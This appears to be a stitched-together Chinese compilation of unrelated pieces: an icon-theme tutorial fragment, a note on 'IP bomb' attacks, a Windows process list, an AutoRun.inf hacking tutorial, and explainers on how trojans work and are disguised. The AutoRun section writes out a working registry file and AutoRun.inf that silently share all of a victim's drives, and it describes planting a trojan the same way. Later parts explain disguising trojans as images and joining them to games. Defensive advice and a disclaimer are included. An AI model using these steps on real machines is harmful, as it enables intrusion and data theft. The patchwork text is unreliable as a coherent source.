IP的另一种主题发布形式是单独的一个 .ip 文件，这个文件是IP专用格式的图标压缩包，里面包括了该图标主题中的图标文件以及IP的图标主题定义文件，用其他软件是打不开的，使用起来和 .theme 一样，只要双击就会在IP中载入，不过IP会先将这个压缩包解压到自己

安装目录中的 themes 目录下再载入，原来的 .ip 文件位置不会影响到图标主题的使用。另外，IP图标主题中也可以包含鼠标指针，定义方式和图标是一样的。大家找个比较完整的IP图标主题研究一下定义文件就明白了。

本教程只是讲图标主题的应用，至于IP的其他功能和应用大家就可以自己研究了，总之IP是一个强大而又好用的图标工具，不过它的使用是一点都不难的。用它做一个自己的图标主题，发放给自己的朋友，保证裤裤的。一套好的桌面主题加上一套好的图标主题，绝对可以让整个系统焕然一新。

三。IP炸弹

IP炸弹是指用IP炸弹工具(一种黑客攻击软件) ,发送大量的特殊数据包,对远程计算机的Windows系统的漏洞进行攻击,以消耗100%的系统资源，导致服务器停机或重启。IP炸弹攻击主要针对某一个IP地址段内的服务器。对Windows 95/NT来说，主要是利用NetBIOS网络协定的例行处理程序OOB的漏洞，将一些特定的数据封包，以OOB方式放在某个IP地址的某个开启的端口上（通常为139、137、135），使你的电脑突然死机；对Windows 98系统的攻击主要是针对Windows98系统的自身蓝屏漏洞；而对Windows 2000的攻击，是通过其本身存在很多拒绝服务的漏洞。

我点任何一个应用程序 该病毒立即在桌面上创建一样的图标包含ico图标

右击任务栏→资源管理器→进程，找到你认为可能是病毒的进程，然后右击→结束进程树。然后你应该就可以正常使用杀毒软件了，然后把系统全杀毒一遍。

以下是操作系统进程，结束进程时可以对照一下。

system process

进程文件: [system process] or [system process]

进程名称: Windows内存处理系统进程

描述: Windows页面内存管理进程，拥有0级优先。

是否为系统进程: 是

alg.exe

进程文件: alg or alg.exe

进程名称: 应用层网关服务

描述: 这是一个应用层网关服务用于网络共享。

是否为系统进程: 是

csrss.exe

进程文件: csrss or csrss.exe

进程名称: Client/Server Runtime Server Subsystem

描述: 客户端服务子系统，用以控制Windows图形相关子系统。

是否为系统进程: 是

ddhelp.exe

进程文件: ddhelp or ddhelp.exe

进程名称: DirectDraw Helper

描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。

是否为系统进程: 是

dllhost.exe

进程文件: dllhost or dllhost.exe

进程名称: DCOM DLL Host进程

描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。

是否为系统进程: 是

inetinfo.exe

进程文件: inetinfo or inetinfo.exe

进程名称: IIS Admin Service Helper

描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分，用于Debug调试除错。

是否为系统进程: 是

internat.exe

进程文件: internat or internat.exe

进程名称: Input Locales

描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。

是否为系统进程: 是

kernel32.dll

进程文件: kernel32 or kernel32.dll

进程名称: Windows壳进程

描述: Windows壳进程用于管理多线程、内存和资源。

是否为系统进程: 是

lsass.exe

进程文件: lsass or lsass.exe

进程名称: 本地安全权限服务

描述: 这个本地安全权限服务控制Windows安全机制。

是否为系统进程: 是

mdm.exe

进程文件: mdm or mdm.exe

进程名称: Machine Debug Manager

描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft Script Editor脚本编辑器。

是否为系统进程: 是

mmtask.tsk

进程文件: mmtask or mmtask.tsk

进程名称: 多媒体支持进程

描述: 这个Windows多媒体后台程序控制多媒体服务，例如MIDI。

是否为系统进程: 是

mprexe.exe

进程文件: mprexe or mprexe.exe

进程名称: Windows路由进程

描述: Windows路由进程包括向适当的网络部分发出网络请求。

是否为系统进程: 是

msgsrv32.exe

进程文件: msgsrv32 or msgsrv32.exe

进程名称: Windows信使服务

描述: Windows信使服务调用Windows驱动和程序管理在启动。

是否为系统进程: 是

mstask.exe

进程文件: mstask or mstask.exe

进程名称: Windows计划任务

描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。

是否为系统进程: 是

regsvc.exe

进程文件: regsvc or regsvc.exe

进程名称: 远程注册表服务

描述: 远程注册表服务用于访问在远程计算机的注册表。

是否为系统进程: 是

rpcss.exe

进程文件: rpcss or rpcss.exe

进程名称: RPC Portmapper

描述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。

是否为系统进程: 是

services.exe

进程文件: services or services.exe

进程名称: Windows Service Controller

描述: 管理Windows服务。

是否为系统进程: 是

smss.exe

进程文件: smss or smss.exe

进程名称: Session Manager Subsystem

描述: 该进程为会话管理子系统用以初始化系统变量，MS-DOS驱动名称类似LPT1以及COM，调用Win32壳子系统和运行在Windows登陆过程。

是否为系统进程: 是

snmp.exe

进程文件: snmp or snmp.exe

进程名称: Microsoft SNMP Agent

描述: Windows简单的网络协议代理（SNMP）用于监听和发送请求到适当的网络部分。

是否为系统进程: 是

spool32.exe

进程文件: spool32 or spool32.exe

进程名称: Printer Spooler

描述: Windows打印任务控制程序，用以打印机就绪。

是否为系统进程: 是

spoolsv.exe

进程文件: spoolsv or spoolsv.exe

进程名称: Printer Spooler Service

描述: Windows打印任务控制程序，用以打印机就绪。

是否为系统进程: 是

stisvc.exe

进程文件: stisvc or stisvc.exe

进程名称: Still Image Service

描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。

是否为系统进程: 是

svchost.exe

进程文件: svchost or svchost.exe

进程名称: Service Host Process

描述: Service Host Process是一个标准的动态连接库主机处理服务。

是否为系统进程: 是

system

进程文件: system or system

进程名称: Windows System Process

描述: Microsoft Windows系统进程。

是否为系统进程: 是

taskmon.exe

进程文件: taskmon or taskmon.exe

进程名称: Windows Task Optimizer

描述: windows任务优化器监视你使用某个程序的频率，并且通过加载那些经常使用的程序来整理优化硬盘。

是否为系统进程: 是

tcpsvcs.exe

进程文件: tcpsvcs or tcpsvcs.exe

进程名称: TCP/IP Services

描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。

是否为系统进程: 是

winlogon.exe

进程文件: winlogon or winlogon.exe

进程名称: Windows Logon Process

描述: Windows NT用户登陆程序。

是否为系统进程: 是

winmgmt.exe

进程文件: winmgmt or winmgmt.exe

进程名称: Windows Management Service

描述: Windows Management Service透过Windows Management Instrumentation data (WMI)技术处理来自应用客户端的请求。

是否为系统进程: 是

盘符里总一个删也删不去又不断换名字的EXE文件,是病毒吗?

绝对中了诺虫病毒了～～

彻底删除Autorun.inf病毒。

最近网上流行通过AutoRun.inf文件使对方所有的硬盘完全共享或中木马的方法，由于AutoRun.inf文件在黑客技术中的应用还是很少见的，相应的资料也不多，有很多人对此觉得很神秘，本文试图为您解开这个迷，使您能完全的了解这个并不复杂却极其有趣的技术。

一、理论基础

经常使用光盘的朋友都知道，有很多光盘放入光驱就会自动运行，它们是怎么做的呢？光盘一放入光驱就会自动被执行，主要依靠两个文件，一是光盘上的AutoRun.inf文件，另一个是操作系统本身的系统文件之一的Cdvsd.vxd。Cdvsd.vxd会随时侦测光驱中是否有放入光盘的动作，如果有的话，便开始寻找光盘根目录下的AutoRun.inf文件。如果存在AutoRun.inf文件则执行它里面的预设程序。

AutoRun.inf不光能让光盘自动运行程序，也能让硬盘自动运行程序，方法很简单，先打开记事本，然后用鼠标右键点击该文件，在弹出菜单中选择“重命名”，将其改名为AutoRun.inf，在AutoRun.inf中键入以下内容：

[AutoRun] //表示AutoRun部分开始，必须输入

Icon=C:\C.ico //给C盘一个个性化的盘符图标C.ico

Open=C:\1.exe //指定要运行程序的路径和名称，在此为C盘下的1.exe

保存该文件，按F5刷新桌面，再看“我的电脑”中的该盘符（在此为C盘），你会发现它的磁盘图标变了，双击进入C盘，还会自动播放C盘下的1.exe文件！

解释一下：“[AutoRun]”行是必须的固定格式，“Icon”行对应的是图标文件，“C:\C.ico”为图标文件路径和文件名，你在输入时可以将它改为你的图片文件所在路径和文件名。另外，“.ico”为图标文件的扩展名，如果你手头上没有这类文件，可以用看图软件ACDSee将其他格式的软件转换为ico格式，或者找到一个后缀名为BMP的文件，将它直接改名为ICO文件即可。

“Open”行指定要自动运行的文件及其盘符和路径。要特别说明的是，如果你要改变的硬盘跟目录下没有自动播放文件，就应该把“OPEN”行删掉，否则就会因为找不到自动播放文件而打不开硬盘，此时只能用鼠标右键单击盘符在弹出菜单中选“打开”才行。

请大家注意：保存的文件名必须是“AutoRun.inf”，编制好的Autorun.inf文件和图标文件一定要放在硬盘根目录下。更进一步，如果你的某个硬盘内容暂时比较固定的话，不妨用Flash做一个自动播放文件，再编上“Autorun”文件，那你就有最酷、最个性的硬盘了。

到这儿还没有完。大家知道，在一些光盘放入后，我们在其图标上单击鼠标右键，还会产生一个具有特色的目录菜单，如果能对着我们的硬盘点击鼠标右键也产生这样的效果，那将更加的有特色。其实，光盘能有这样的效果也仅仅是因为在AutoRun.inf文件中有如下两条语句：

shell\标志＝显示的鼠标右键菜单中内容

shell\标志\command＝要执行的文件或命令行

所以，要让硬盘具有特色的目录菜单，在AutoRun.inf文件中加入上述语句即可，示例如下：

shell\1=天若有情天亦老

shell\1\command\=notepad ok.txt

保存完毕，按F5键刷新，然后用鼠标右键单击硬盘图标，在弹出菜单中会发现“天若有情天亦老”（图1），点击它，会自动打开硬盘中的“ok.txt”文件。注意：上面示例假设“ok.txt”文件在硬盘根目录下，notepad为系统自带的记事本程序。如果要执行的文件为直接可执行程序，则在“command\”后直接添加该执行程序文件名即可。

图 1

二、实例

下面就举个例子：如果你扫到一台开着139共享的机器，而对方只完全共享了D盘，我们要让对方的所有驱动器都共享。首先编辑一个注册表文件，打开记事本，键入以下内容：

REGEDIT4

'此处一定要空一行

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]

"Path"="C:\\"

"Remark"=""

"Type"=dword:00000000

"Flags"=dword:00000302

"Parmlenc"=hex:

"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\D$]

"Path"="D:\\"

"Remark"=""

"Type"=dword:00000000

"Flags"=dword:00000302

"Parmlenc"=hex:

"Parm2enc"=hex:

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\Lanman\C$]

"Path"="E:\\"

"Remark"=""

"Type"=dword:00000000

"Flags"=dword:00000302

"Parmlenc"=hex:

"Parm2enc"=hex:

以上我只设置到E盘，如果对方有很多逻辑盘符的请自行设置。将以上部分另存为Share.reg文件备用。要特别注意REGEDIT4为大写且顶格书写，其后要空上一行，在最后一行记得要按一次回车键。

然后打开记事本，编制一个AutoRun.inf文件，键入以下内容：

[AutoRun]

Open=regedit/s Share.reg //加/s参数是为了导入时不会显示任何信息

保存AutoRun.inf文件。将Share.reg和AutoRun.inf这两个文件都复制到对方的D盘的根目录下，这样对方只要双击D盘就会将Share.reg导入注册表，这样对方电脑重启后所有驱动器就会都完全共享出来。

如果想让对方中木马，只要在AutoRun.inf文件中，把“Open=Share.Reg”改成“Open=木马服务端文件名”，然后把AutoRun.inf和配置好的木马服务端一起复制到对方D盘的根目录下，这样不需对方运行木马服务端程序，而只需他双击D盘就会使木马运行！这样做的好处显而易见，那就是大大的增加了木马运行的主动性！须知许多人现在都是非常警惕的，不熟悉的文件他们轻易的不会运行，而这种方法就很难防范了。

要说明的是，给你下木马的人不会那么蠢的不给木马加以伪装，一般说来，他们会给木马服务端文件改个名字，或好听或和系统文件名很相像，然后给木马换个图标，使它看起来像TXT文件、ZIP文件或图片文件等，，最后修改木马的资源文件使其不被杀毒软件识别（具体的方法可以看本刊以前的文章），当服务端用户信以为真时，木马却悄悄侵入了系统。其实，换个角度理解就不难了——要是您给别人下木马我想你也会这样做的。以上手段再辅以如上内容的AutoRun.inf文件就天衣无缝了！

三、防范方法

共享分类完全是由flags标志决定的，它的键值决定了共享目录的类型。当flags=0x302时，重新启动系统，目录共享标志消失，表面上看没有共享，实际上该目录正处于完全共享状态。网上流行的共享蠕虫，就是利用了此特性。如果把"Flags"=dword:00000302改成"Flags"=dword:00000402，就可以看到硬盘被共享了，明白了吗？秘密就在这里！

以上代码中的Parmlenc、Parm2enc属性项是加密的密码，系统在加密时采用了8位密码分别与“35 9a 4b a6 53 a9 d4 6a”进行异或运算，要想求出密码再进行一次异或运算，然后查ASCII表可得出目录密码。在网络软件中有一款软件就利用该属性进行网络密码破解的，在局域网内从一台机器上可以看到另一台计算机的共享密码。

利用TCP/IP协议设计的NethackerⅡ软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。

解决办法是把HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan下面的“C$”、“D$”、“E$”等删掉。然后删除windows\system\下面的Vserver.vxd删除，它是Microsoft网络上的文件与打印机共享虚拟设备驱动程序，再把HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VxD\下的Vserver键值删掉，就会很安全了。

另外，关闭硬盘AutoRun功能也是防范黑客入侵的有效方法之一。具体方法是在“开始”菜单的“运行”中输入Regedit，打开注册表编辑器，展开到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Exploer主键下，在右侧窗格中找到“NoDriveTypeAutoRun”，就是这个键决定了是否执行CDROM或硬盘的AutoRun功能。

双击“NoDriveTypeAutoRun”，在默认状态下（即你没有禁止过AutoRun功能），在弹出窗口中可以看到“NoDriveTypeAutoRun”默认键值为95,00,00,00，如图所示（图2）。其中第一个值“95”是十六进制值，它是所有被禁止自动运行设备的和。将“95”转为二进制就是10010101，其中每位代表一个设备，Windows中不同设备会用如下数值表示：

图 2

设备名称 第几位 值 设备用如下数值表示 设备名称含义

DKIVE_UNKNOWN 0 1 01h 不能识别的设备类型

DRIVE_NO_ROOT_DIR 1 0 02h 没有根目录的驱动器(Drive without root directory)

DRIVE_REMOVABLE 2 1 04h 可移动驱动器(Removable drive)

DRIVE_FIXED 3 0 08h 固定的驱动器(Fixed drive)

DRIVE_REMOTE 4 1 10h 网络驱动器(Network drive)

DRIVE_CDROM 5 0 20h 光驱(CD-ROM)

DRIVE_RAMDISK 6 0 40h RAM磁盘(RAM Disk)

保留 7 1 80h 未指定的驱动器类型(Not yet specified drive disk)

在上面所列的表中值为“0”表示设备运行，值为“1”表示该设备不运行（默认情况下，Windows禁止80h、10h、4h、01h这些设备自动运行，这些数值累加正好是十六进制的95h，所以NoDriveTypeAutoRun”默认键值为95,00,00,00）。

由上面的分析不难看出，在默认情况下，会自动运行的设备是DRIVE_NO_ROOT_DIR、DRIVE_FIXED、DRIVE_CDROM、DRIVE_RAMDISK这四个保留设备，所以要禁止硬盘自动运行AutoRun.inf文件，就必须将DRIVE_FIXED的值设为1，这是因为DRIVE_FIXED代表固定的驱动器，即硬盘。这样一来，原来的10010101（在表中“值”列中由下向上看）就变成了二进制的10011101，转为十六进制为9D。现在，将“NoDriveTypeAutoRun”的键值改为9D,00,00,00后关闭注册表编辑器，重启电脑后就会关闭硬盘的AutoRun功能。

如果你看明白了，那你肯定知道该怎样禁止光盘AutoRun功能了，对！就是将DRIVE_CDROM设为1，这样“NoDriveTypeAutoRun”键值中的第一个值就变成了10110101，也就是十六进制的B5。将第一个值改为B5后关闭注册表编辑器，重启电脑后就会关闭CDROM的Autorun功能。如果仅想禁止软件光盘的AutoRun功能，但又保留对CD音频碟的自动播放能力，这时只需将“NoDriveTypeAutoRun”的键值改为：BD,00,00,00即可。

如果想要恢复硬盘或光驱的AutoRun功能，进行反方向操作即可。

事实上，大多数的硬盘根目录下并不需要AutoRun.inf文件来运行程序，因此我们完全可以将硬盘的AutoRun功能关闭，这样即使在硬盘根目录下有AutoRun.inf这个文件，Windows也不会去运行其中指定的程序，从而可以达到防止黑客利用AutoRun.inf文件入侵的目的。

除此以外，我们还应让Windows能显示出隐藏的共享。大家都知道，在Windows 9X中设置共享时，通过在共享名后加上“$”这个符号，可使共享隐藏。比如，我们给一个名为share的计算机的C盘设置共享时，只要将其共享名设为C$。这样我们将看不到被共享的C盘，只有通过输入该共享的确切路径，才能访问此共享。不过我们只要用将电脑中的msnp32.dll文件稍做修改。就可以让Windows显示出隐藏的共享。

由于在Windows下msnp32.dll会被调用，不能直接修改此文件，所以第一步我们要复制msnp32.dll到C盘下并改名为msnp32，msnp32.dll在C:\Windows\system文件夹下。运行UltraEdit等十六进制文件编辑器打开msnp32，找到“24 56 E8 17”（位于偏移地址00003190～000031A0处），找到后将“24”改为“00”，然后保存，关闭UltraEdit。重启计算机进入DOS模式，在命令提示符下输入copy c:\msnp32.dll c:\Windows\system\msnp32.dll，重启进入Windows，现在双击share就能看见被隐藏的共享了。

最后要提醒大家利用TCP/IP协议设计的NethackerⅡ等黑客软件可以穿过Internet网络，找到共享的主机，然后进行相应操作。所以当您通过Modem上网时，千万要小心，因为一不小心，您的主机将完全共享给对方了。防范这类事情发生的方法无非是经常检查系统，给系统打上补丁，经常使用反黑杀毒软件，上网时打开防火墙，注意异常现象，留意AutoRun.inf文件的内容，关闭共享或不要设置为完全共享，且加上复杂的共享密码。

声明：本文的目的是使大家能清楚地了解网上流行的黑客手段，增强自己的防护意识，因此请大家不要用本文的方法去干违法的事情，切记：己所不欲，勿施于人！

电脑疑难专业群：1689926

参考资料：

为什么黑客能从IP地址进入电脑盗取号码?

木马入侵的工作原理

在介绍木马的工作原理之前有一些木马构成的基础知识我们要事先加以说明，因为下面有很多地方会提到这些内容。一个完整的木马系统由硬件部分，软件部分和具体连接部分组成。

(1)硬件部分：建立木马连接所必须的硬件实体。控制端：对服务端进行远程控制的一方。服务端：被控制端远程控制的一方。INTERNET：控制端对服务端进行远程控制，数据传输的网络载体。

(2)软件部分：实现远程控制所必须的软件程序。控制端程序：控制端用以远程控制服务端的程序。木马程序：潜入服务端内部，获取其操作权限的程序。木马配置程序：设置木马程序的端口号，触发条件，木马名称等，使其在服务端藏得更隐蔽的程序。

(3)具体连接部分：通过INTERNET在服务端和控制端之间建立一条木马通道所必须的元素。控制端IP，服务端IP：即控制端，服务端的网络地址，也是木马进行数据传输的目的地。控制端端口，木马端口：即控制端，服务端的数据入口，通过这个入口，数据可直达控制端程序或木马程序。

用木马这种黑客工具进行网络入侵，从过程上看大致可分为六步，下面我们就按这六步来详细阐述木马的攻击原理。

（一）配置木马

一般来说一个设计成熟的木马都有木马配置程序，从具体的配置内容看，主要是为了实现以下两方面功能：

(1)木马伪装：木马配置程序为了在服务端尽可能的隐藏木马，会采用多种伪装手段，如修改图标，捆绑文件，定制端口，自我销毁等。

(2)信息反馈：木马配置程序将就信息反馈的方式或地址进行设置，如设置信息反馈的邮件地址，IRC号，ICO号等等。

（二）传播木马

1、传播方式：木马的传播方式主要有两种：一种是通过E-MAIL，控制端将木马程序以附件的形式夹在邮件中发送出去，收信人只要打开附件系统就会感染木马；另一种是软件下载，一些非正规的网站以提供软件下载为名义，将木马捆绑在软件安装程序上，下载后，只要一运行这些程序，木马就会自动安装。

2、伪装方式：鉴于木马的危害性,很多人对木马知识还是有一定了解的，这对木马的传播起了一定的抑制作用，这是木马设计者所不愿见到的，因此他们开发了多种功能来伪装木马，以达到降低用户警觉，欺骗用户的目的。主要有以下6个方面：

（1）修改图标：当你在E-MAIL的附件中看到这个图标时，是否会认为这是个文本文件呢？但是我不得不告诉你，这也有可能是个木马程序，现在已经有木马可以将木马服务端程序的图标改成HTML，TXT， ZIP等各种文件的图标，这有相当大的迷惑性，但是目前提供这种功能的木马还不多见，并且这种伪装也不是无懈可击的，所以不必整天提心吊胆，疑神疑鬼的。

（2）捆绑文件：这种伪装手段是将木马捆绑到一个安装程序上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷的进入了系统。至于被捆绑的文件一般是可执行文件(即EXE，COM一类的文件)。

（3）出错显示：有一定木马知识的人都知道，如果打开一个文件，没有任何反应，这很可能就是个木马程序，木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。当服务端用户打开木马程序时，会弹出一个错误提示框(这当然是假的)，错误内容可自由定义，大多会定制成一些诸如“文件已破坏，无法打开！”之类的信息，当服务端用户信以为真时，木马却悄悄侵入了系统。

（4）定制端口：很多老式的木马端口都是固定的，这给判断是否感染了木马带来了方便，只要查一下特定的端口就知道感染了什么木马，所以现在很多新式的木马都加入了定制端口的功能，控制端用户可以在1024---65535之间任选一个端口作为木马端口(一般不选1024以下的端口)，这样就给判断所感染木马类型带来了麻烦。

（5）自我销毁： 这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马会将自己拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下)，一般来说原木马文件和系统文件夹中的木马文件的大小是一样的(捆绑文件的木马除外)，那么中了木马的朋友只要在近来收到的信件和下载的软件中找到原木马文件，然后根据原木马的大小去系统文件夹找相同大小的文件，判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工具帮助下，就很难删除木马了。

（6）木马更名：安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章，在系统文件夹查找特定的文件。就可以断定中了什么木马。所以现在有很多木马都允许控制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。

（三）运行木马： 服务端用户运行木马或捆绑木马的程序后，木马就会自动进行安装。首先将自身拷贝到WINDOWS的系统文件夹中(C:WINDOWS或C:WINDOWSSYSTEM目录下)，然后在注册表，启动组，非启动组中设置好木马的触发条件，这样木马的安装就完成了。安装后就可以启动木马了。

(1)由触发条件激活木马。触发条件是指启动木马的条件,大致出现在下面八个地方：

第一、注册表：打开HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion下的五个以Run和RunServices主键，在其中寻找可能是启动木马的键值。

第二、WIN.INI:C:WINDOWS目录下有一个配置文件win.ini，用文本方式打开，在[windows]字段中有启动命令load=和run=，在一般情况下是空白的，如果有启动程序，可能是木马。

第三、SYSTEM.INI:C:WINDOWS目录下有个配置文件system.ini，用文本方式打开，在[386Enh]，[mic]，[drivers32]中有命令行，在其中寻找木马的启动命令。

第四、Autoexec.bat和Config.sys：在C盘根目录下的这两个文件也可以启动木马。但这种加载方式一般都需要控制端用户与服务端建立连接后，将已添加木马启动命令的同名文件上传到服务端覆盖这两个文件才行。

第五*.INI：即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。

第六、注册表：打开HKEY_CLASSES_ROOT文件类型shellopencommand主键，查看其键值。举个例子，国产木马“冰河”就是修改HKEY_CLASSES_ROOTtxtfileshellopencommand下的键值，将“C :WINDOWS NOTEPAD.EXE %1”改为“C:WINDOWSSYSTEMSYSEXPLR.EXE %1”，这时你双击一个TXT文件后，原本应用NOTEPAD打开文件的，现在却变成启动木马程序了。还要说明的是不光是TXT文件，通过修改HTML，EXE，ZIP等文件的启动命令的键值都可以启动木马，不同之处只在于“文件类型”这个主键的差别，TXT是txtfile，ZIP是WINZIP，大家可以试着去找一下。

第七、捆绑文件：实现这种触发条件首先要控制端和服务端已通过木马建立连接，然后控制端用户用工具软件将木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。

第八、启动菜单：在“开始---程序---启动”选项下也可能有木马的触发条件。

(2)木马运行过程。木马被激活后，进入内存，并开启事先定义的木马端口，准备与控制端建立连接。这时服务端用户可以在MS-DOS方式下，键入NETSTAT -AN查看端口状态，一般个人电脑在脱机状态下是不会有端口开放的，如果有端口开放，你就要注意是否感染木马了。

在上网过程中要下载软件，发送信件，网上聊天等必然打开一些端口，下面是一些常用的端口：

①1---1024之间的端口：这些端口叫保留端口，是专给一些对外通讯的程序用的，如FTP使用21，SMTP使用25，POP3使用110等。只有很少木马会用保留端口作为木马端口的。

②1025以上的连续端口：在上网浏览网站时，浏览器会打开多个连续的端口下载文字，图片到本地硬盘上，这些端口都是1025以上的连续端口。

③4000端口：这是OICQ的通讯端口。

④6667端口：这是IRC的通讯端口。 除上述的端口基本可以排除在外，如发现还有其它端口打开，尤其是数值比较大的端口，那就要怀疑是否感染了木马，当然如果木马有定制端口的功能，那任何端口都有可能是木马端口。

（四）信息泄露：一般来说，设计成熟的木马都有一个信息反馈机制。所谓信息反馈机制是指木马成功安装后会收集一些服务端的软硬件信息，并通过E-MAIL，IRC或ICO的方式告知控制端用户。

（五）建立连接： 一个木马连接的建立首先必须满足两个条件：一是服务端已安装了木马程序；二是控制端，服务端都要在线 。在此基础上控制端可以通过木马端口与服务端建立连接。

假设A机为控制端，B机为服务端，对于A机来说要与B机建立连接必须知道B机的木马端口和IP地址，由于木马端口是A机事先设定的，为已知项，所以最重要的是如何获得B机的IP地址。获得B机的IP 地址的方法主要有两种：信息反馈和IP扫描。我们重点来介绍IP扫描，因为B机装有木马程序，所以它的木马端口7626是处于开放状态的，所以现在A机只要扫描IP地址段中7626端口开放的主机就行了，假设B机的IP地址是202.102.47.56，当A机扫描到这个IP时发现它的7626端口是开放的，那么这个IP就会被添加到列表中，这时A机就可以通过木马的控制端程序向B机发出连接信号，B机中的木马程序收到信号后立即作出响应，当A机收到响应的信号后，开启一个随即端口1031与B机的木马端口7626建立连接，到这时一个木马连接才算真正建立。值得一提的要扫描整个IP地址段显然费时费力，一般来说控制端都是先通过信息反馈获得服务端的IP地址，由于拨号上网的IP是动态的，即用户每次上网的IP都是不同的，但是这个IP是在一定范围内变动的，B机的IP是202.102.47.56，那么B机上网IP的变动范围是在202.102.000.000---202.102.255.255，所以每次控制端只要搜索这个IP地址段就可以找到B机了。

（六）远程控制：木马连接建立后，控制端端口和木马端口之间将会出现一条通道。控制端上的控制端程序可藉这条通道与服务端上的木马程序取得联系，并通过木马程序对服务端进行远程控制。下面我们就介绍一下控制端具体能享有哪些控制权限，这远比你想象的要大。

(1)窃取密码：一切以明文的形式，*形式或缓存在CACHE中的密码都能被木马侦测到，此外很多木马还提供有击键记录功能，它将会记录服务端每次敲击键盘的动作，所以一旦有木马入侵， 密码将很容易被窃取。

(2)文件操作：控制端可藉由远程控制对服务端上的文件进行删除，新建，修改，上传，下载，运行，更改属性等一系列操作，基本涵盖了WINDOWS平台上所有的文件操作功能。

(3)修改注册表：控制端可任意修改服务端注册表，包括删除，新建或修改主键，子键，键值。有了这项功能控制端就可以禁止服务端软驱，光驱的使用，锁住服务端的注册表，将服务端上木马的触发条件设置得更隐蔽一系列高级操作。

(4)系统操作：这项内容包括重启或关闭服务端操作系统，断开服务端网络连接，控制服务端的鼠标，键盘，监视服务端桌面操作，查看服务端进程等，控制端甚至可以随时给服务端发送信息，想象一下，当服务端的桌面上突然跳出一段话，这是多么吓人的事。

tt

四、黑客是如何骗取你执行木马的

如今大多数上网的朋友警惕性都很高，想骗取他们执行木马是件很困难的事，因为木马出现这么久，木马两个字听得人们耳朵都长出了老茧，可说是谈“马”色变，即使不是电脑高手都知道，一见到是exe 文件便不会轻易“招惹”它，因而中标的机会也就相对减少了。对于此，黑客们是不会甘于寂寞的，在黑客的世界里挑战与刺激才是他们趋之若婺的。

1、冒充为图像文件

首先，黑客最常使用骗别人执行木马的方法，就是将特洛伊木马说成为图像文件，比如说是照片等，应该说这是一个最不合逻辑的方法，但却是最多人中招的方法，有效而又实用 。

只要入侵者扮成美眉及更改服务器程序的文件名(例如 sam.exe )为“类似”图像文件的名称，再假装传送照片给受害者，受害者就会立刻执行它。为什么说这是一个不合逻辑的方法呢？图像文件的扩展名根本就不可能是.exe，而木马程序的扩展名基本上又必定是.exe ，明眼人一看就会知道有问题，多数人在接收时一看见是exe文件，便不会接收了，那有什么方法呢? 其实方法很简单，他只要把文件名改变，例如把“sam.exe” 更改为“sam.jpg” ，那么在传送时，对方只会看见sam.jpg 了，而到达对方电脑时，因为windows 默认值是不显示扩展名的，所以很多人都不会注意到扩展名这个问题，而恰好你的计算机又是设定为隐藏扩展名的话，那么你看到的只是sam.jpg 了，受骗也就在所难免了。

还有一个问题就是，木马本身是没有图标的，而在电脑中它会显示一个windows 预设的图标，别人一看便会知道了！但入侵者还是有办法的，这就是给文件换个“马甲”，即修改文件图标。修改文件图标的方法如下：

1）比如到 下载一个名为IconForge 的软件，再进行安装。

2）执行程序，按下File Open

3） 在File Type 选择exe 类

4）在File Open 中载入预先制作好的图标( 可以用绘图软件或专门制作icon 的软件制作，也可以在网上找找) 。

5）然后按下File Save 便可以了。

如此这般最后得出的，便是看似jpg 或其他图片格式的木马了，很多人就会不经意间执行了它。

2、合并程序欺骗

通常有经验的用户，是不会将图像文件和可执行文件混淆的，所以很多入侵者一不做二不休，干脆将木马程序说成是应用程序：反正都是以 exe 作为扩展名的。然后再变着花样欺骗受害者，例如说成是新出炉的游戏，无所不能的黑客程序等等，目地是让受害者立刻执行它。而木马程序执行后一般是没有任何反应的，于是在悄无声息中，很多受害者便以为是传送时文件损坏了而不再理会它。

如果有更小心的用户，上面的方法有可能会使他们的产生坏疑，所以就衍生了一些合拼程序。合拼程序是可以将两个或以上的可执行文件(exe文件) 结合为一个文件，以后只需执行这个合拼文件，两个可执行文件就会同时执行。如果入侵者将一个正常的可执行文件(一些小游戏如 wrap.exe) 和一个木马程序合拼，由于执行合拼文件时 wrap.exe会正常执行，受害者在不知情中，背地里木马程序也同时执行了。而这其中最常用到的软件就是joiner，由于它具有更大的欺骗性，使得安装特洛伊木马的一举一动了无痕迹，是一件相当危险的黑客工具。让我们来看一下它是如何运作的：

以往有不少可以把两个程序合拼的软件为黑客所使用，但其中大多都已被各大防毒软件列作病毒了，而且它们有两个突出的问题存在，这问题就是：

（1）合拼后的文件体积过大

（2）只能合拼两个执行文件

